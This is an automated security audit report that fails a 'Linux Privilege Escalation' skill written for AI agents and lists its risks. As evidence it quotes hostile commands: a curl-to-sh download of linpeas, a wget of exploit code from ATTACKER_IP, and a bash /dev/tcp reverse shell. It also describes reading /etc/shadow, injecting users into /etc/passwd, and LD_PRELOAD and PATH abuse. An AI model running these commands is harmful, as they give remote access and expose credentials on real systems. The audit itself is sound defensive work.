Linux Privilege Escalation
Fail
Audited by Gen Agent Trust Hub on Jul 28, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONCREDENTIALS_UNSAFE
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill instructs the agent to download and execute scripts directly from external sources using high-risk patterns.
- Evidence:
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | shin Phase 2. - Evidence: Downloading and compiling exploit source code from an attacker-controlled server (
wget http://ATTACKER_IP/exploit.c && gcc exploit.c -o exploit). - [DATA_EXFILTRATION]: The skill provides multiple methods for establishing reverse shells to external IP addresses, which can be used to exfiltrate data or maintain unauthorized access.
- Evidence: Bash reverse shell:
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1. - Evidence: Python, Netcat, and Perl one-liners designed to connect the target system to an external attacker machine.
- [CREDENTIALS_UNSAFE]: The skill facilitates the discovery and harvesting of sensitive system credentials.
- Evidence: Instructions to read
/etc/shadowand/etc/passwdusing SUID binaries likebase64ornanoto facilitate offline password cracking. - Evidence: Instructions to generate password hashes and inject new users into the
/etc/passwdfile. - [COMMAND_EXECUTION]: The skill utilizes a wide array of dangerous command patterns to escalate privileges.
- Evidence: PATH hijacking by manipulating the environment variable (
export PATH=/tmp:$PATH). - Evidence: Abuse of
sudoprivileges andLD_PRELOADto execute arbitrary code as the root user. - Evidence: Exploitation of SUID binaries and Linux capabilities to bypass standard permission sets.
Recommendations
- HIGH: Downloads and executes remote code from: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata